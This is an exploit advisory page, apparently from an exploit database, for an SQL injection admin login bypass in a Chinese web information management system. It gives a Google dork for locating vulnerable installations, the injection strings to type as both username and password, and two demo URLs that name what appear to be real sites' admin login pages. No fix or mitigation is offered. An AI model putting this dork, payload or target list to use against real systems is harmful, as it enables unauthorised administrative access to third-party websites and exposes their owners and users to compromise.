创梦网络信息管理系统 Admin Login Bypass

2017.04.20
Credit: 3F-Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

====================================================== # Exploit Title: 创梦网络信息管理系统 Admin Login Bypass # Google Dork: intext:"创梦网络信息管理系统" # Date: 20/04/2017 # Author: sohaip-hackerDZ # Team: 3F-Team # Facebook: https://www.facebook.com/sohaipbarika # Tested on: linux mint x64 *************************************************** [+] Dorking in google or other search enggine [+] Open target [+] Enter username and password with [+] Username: '=' 'or' [+] Password: '=' 'or' ====================================================== [+] Demo Site [+] http://www.rayleepaper.com/admin/login.php [+] http://www.gzcmok.cn//admin/login.php ====================================================== Thanks To 3F-Team sohaip-hackerDZ | maxhacker |


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top